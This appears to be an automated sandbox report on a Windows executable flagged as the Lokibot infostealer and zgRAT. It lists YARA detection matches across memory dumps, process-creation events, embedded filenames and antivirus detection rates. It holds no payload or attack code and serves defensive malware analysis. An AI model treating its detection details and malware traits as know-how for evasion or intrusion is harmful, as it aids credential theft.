Source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ZciowjM9hN.exe.3beb450.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ZciowjM9hN.exe.3beb450.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ZciowjM9hN.exe.3c05470.7.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ZciowjM9hN.exe.3c05470.7.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ZciowjM9hN.exe.7470000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.ZciowjM9hN.exe.3dafef0.2.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.3.ZciowjM9hN.exe.3dafef0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.3.ZciowjM9hN.exe.3d39ed0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.323829302.0000000007470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Source: ZciowjM9hN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ZciowjM9hN.exe.7470000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.3.ZciowjM9hN.exe.3d39ed0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ZciowjM9hN.exe.3beb450.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.ZciowjM9hN.exe.3beb450.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ZciowjM9hN.exe.3beb450.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ZciowjM9hN.exe.3c05470.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.ZciowjM9hN.exe.3c05470.7.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ZciowjM9hN.exe.3c05470.7.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ZciowjM9hN.exe.7470000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.3.ZciowjM9hN.exe.3dafef0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.3.ZciowjM9hN.exe.3dafef0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.3.ZciowjM9hN.exe.3d39ed0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.323829302.0000000007470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: 0_2_010EC344	0_2_010EC344
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: 0_2_010EE701	0_2_010EE701
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: 0_2_010EE710	0_2_010EE710
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: 9_2_0040549C	9_2_0040549C
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: 9_2_004029D4	9_2_004029D4

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: String function: 00405B6F appears 42 times

Source: ZciowjM9hN.exe, 00000000.00000003.309990373.0000000003C0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIVectorView.dllN vs ZciowjM9hN.exe
Source: ZciowjM9hN.exe, 00000000.00000002.323829302.0000000007470000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameIVectorView.dllN vs ZciowjM9hN.exe
Source: ZciowjM9hN.exe, 00000000.00000002.318330090.00000000008A8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEventActivityOpti.exeJ vs ZciowjM9hN.exe
Source: ZciowjM9hN.exe, 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs ZciowjM9hN.exe
Source: ZciowjM9hN.exe, 00000000.00000002.323627225.0000000007170000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMLang.dll" vs ZciowjM9hN.exe
Source: ZciowjM9hN.exe, 00000000.00000002.319483035.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMLang.dll" vs ZciowjM9hN.exe
Source: ZciowjM9hN.exe, 00000009.00000000.312207105.0000000000F58000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEventActivityOpti.exeJ vs ZciowjM9hN.exe
Source: ZciowjM9hN.exe	Binary or memory string: OriginalFilenameEventActivityOpti.exeJ vs ZciowjM9hN.exe

Source: ZciowjM9hN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ZciowjM9hN.exe	Virustotal: Detection: 57%
Source: ZciowjM9hN.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

File read: C:\Users\user\Desktop\ZciowjM9hN.exe:Zone.Identifier

Jump to behavior

Source: ZciowjM9hN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ZciowjM9hN.exe "C:\Users\user\Desktop\ZciowjM9hN.exe"
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process created: C:\Users\user\Desktop\ZciowjM9hN.exe C:\Users\user\Desktop\ZciowjM9hN.exe
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Process created: C:\Users\user\Desktop\ZciowjM9hN.exe C:\Users\user\Desktop\ZciowjM9hN.exe	Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

